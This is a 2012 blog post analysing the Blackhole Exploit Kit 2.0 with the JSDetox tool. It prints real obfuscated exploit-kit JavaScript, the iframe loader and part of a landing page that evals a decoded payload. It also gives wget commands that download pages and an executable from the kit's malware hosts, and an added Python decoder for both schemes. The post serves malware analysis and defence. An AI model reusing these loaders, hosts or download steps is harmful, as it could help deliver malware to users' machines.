Thursday, September 27, 2012

Analyzing the Blackhole Exploit Kit 2.0 with JSDetox

With the release of the new Blackhole Exploit Kit version, I wanted to check if JSDetox is still able to analyze it. As it turns out, the process is not much different from the last version (shown in this screencast).
I checked http://www.malwaredomainlist.com/update.php to find a current sample. Of course you should not visit those URLs with your normal browser as they contain malware - I will not "hide" those URLs here as they are publicly documented (and seem to be taken offline by now). The same applies to the tool JSDetox itself: run it in an isolated environment.

The obfuscated iframe leading to the exploit kit sounds interesting, so let's use that one:
wget -O pho.htm "basijkarmandan.danaportal.ir/pho.htm"
The downloaded file contains this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>


<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&58&&75&&119&&62&&132&&132
&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

</body>
</html>
Paste the JavaScript code into the textbox in the "Code Analysis" tab and click "Execute":

The code tries to call "window.eval()" - click "Show Code" to see what would be executed:

Click "Send to Analyze" to view the code in the code analysis tab and click "Analyze" to see a formatted version of the code:

Downloading the content of the created iframe...
wget -O column.php "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
This file contains 29 KB of data and looks like this (shortened):
<html><body><script>g="getElementById";cc="concat";ss=String.fromCharCode;gg="getAttribute";function asd(){try{(alert+"fewfbw")()}catch(adgsdg){window["e"+"v"+"a"+"l"](s);}}</script><u id="google" 
d0="+4442494b46)3d42142o3o$453j3l3q2c%3h443h3f44*254b463h42$433l3r3q22_161k1i1r1i&20161g3q3d&3p3h22162o!3o453j3l3q!2c3h443h3f)44161g3k3d&3q3g3o3h42$223i453q3f$443l3r3q1c(3f1g3e1g3d#1d4b423h44+45423q143i$453q3f443l_3r3q1c1d4b#3f1c3e1g3d#1d4d4d1g3l@432c3h3i3l@3q3h3g223i!453q3f443l#3r3q1c3e1d+4b423h4445!42" 

[snip]

d91="43#3h1c1d234d%3f3d443f3k_1c3h1d4b4d*4442494b47&3l443k1c42%3d1l1d4b43&3k3h3o3o3h(483h3f4544^3h1c423d1o$1d234d4d3f!3d443f3k1c%3h1d4b4d4d+3f3d443f3k@1c3h1d4b4d#4d3f3d443f#3k1c3h4242!3q3r1d4b4d!3g3r3f453p$3h3q441i47_423l443h1c+1b1b1d2343$3h44303l3p&3h3r45441c%3h3q3g3b42#3h3g3l423h)3f441g1q1k)1k1k1k1d23"></u><script>
a=document[g]("google");
s="";
for(i=0;;i++){
r=a[gg]("d"[cc](i));
if(r){s=s+r;}else break;
}
a=s;
k="";
a=a.replace(/[^0-9a-z]/g,k);
s="";
for(i=0;i<a.length;i+=2){
try{gbargre-0x32}catch(sdgsdg){if(020==0x10)s+=ss(parseInt(a.substr(i,2),0x1c));}
}
asd();
</script></body></html>
The last version of the Blackhole Exploit Kit I analyzed stored the obfuscated data in the text content of HTML attributes; this version spreads it over different attributes of one single HTML element. To analyze this in JSDetox, copy the whole content of the file into the textbox in the "HTML Document" tab and click "Extract Scripts":

You are then taken to the "Code Analysis" tab where you can analyze the code (it is a decoding loop) or directly execute the script:

JSDetox logs that the code executed "document.getElementById" (to access the big HTML element containing the obfuscated code) and that it emulated that access with the imported HTML data. JSDetox then catches a call to "window.eval()" and makes it possible to view the code that would be executed (click "Show Code" and then "Send to Analyze").
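Both decoding loops above can also be reproduced statically, without executing any of the malicious script. The following Python is an added example (not part of the original post and not JSDetox code) that reimplements the "&&"-separated number scheme of pho.htm and the base-28 attribute scheme of column.php; the sample inputs are the first values copied from the two files above, with the attribute sample split into d0/d1 purely for illustration.

```python
import re
from html.parser import HTMLParser

# Scheme 1 (pho.htm): numbers joined by "&&"; char i is n[i] - (020 + i % h).
# 020 is an octal literal (16), so even positions subtract 16, odd ones 17.
def decode_pho(blob: str, h: int = 2) -> str:
    nums = blob.split("&&")
    return "".join(chr(int(n) - (0o20 + i % h)) for i, n in enumerate(nums))

# Scheme 2 (column.php): the loader concatenates attributes d0, d1, ... of one
# element, strips every char outside [0-9a-z] and reads the remainder as
# base-28 (0x1c) digit pairs, exactly like the parseInt(a.substr(i,2),0x1c) loop.
def decode_column(joined_attrs: str) -> str:
    clean = re.sub(r"[^0-9a-z]", "", joined_attrs)
    return "".join(chr(int(clean[i:i + 2], 28)) for i in range(0, len(clean), 2))

class _AttrCollector(HTMLParser):
    """Grabs all attributes of the element whose id matches (here "google")."""
    def __init__(self, elem_id: str):
        super().__init__()
        self.elem_id, self.attrs = elem_id, {}

    def handle_starttag(self, tag, attrs):
        found = dict(attrs)
        if found.get("id") == self.elem_id:
            self.attrs = found

def extract_column_payload(html: str, elem_id: str = "google") -> str:
    """Static equivalent of the page's getElementById/getAttribute loop."""
    parser = _AttrCollector(elem_id)
    parser.feed(html)
    parts, i = [], 0
    while f"d{i}" in parser.attrs:   # loader stops at the first missing dN
        parts.append(parser.attrs[f"d{i}"])
        i += 1
    return decode_column("".join(parts))

# First 20 numbers of the pho.htm script shown above (copied from the page).
SAMPLE_PHO = ("25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126"
              "&&133&&62&&120&&117&&133&&85&&125")
# Start of d0 from column.php above, split into two attributes (constructed).
SAMPLE_HTML = ('<u id="google" d0="+4442494b46)3d42142o3o$453j3l3q2c" '
               'd1="%3h443h3f44"></u>')

if __name__ == "__main__":
    print(repr(decode_pho(SAMPLE_PHO)))          # "\t\tif (document.getEl"
    print(extract_column_payload(SAMPLE_HTML))   # try{var PluginDetect
```

The real samples decode the same way once the full "&&" string or the complete d0..d91 element is passed in; the decoded text is what JSDetox shows under "Show Code".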

Click "Reformat" to make the code readable. At the end of the code, we find this:

Downloading the file:
wget -O cee0c21.exe "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
A check on VirusTotal gives a detection rate of 6/43; a few hours later it was 11/43, with some major vendors still missing it:
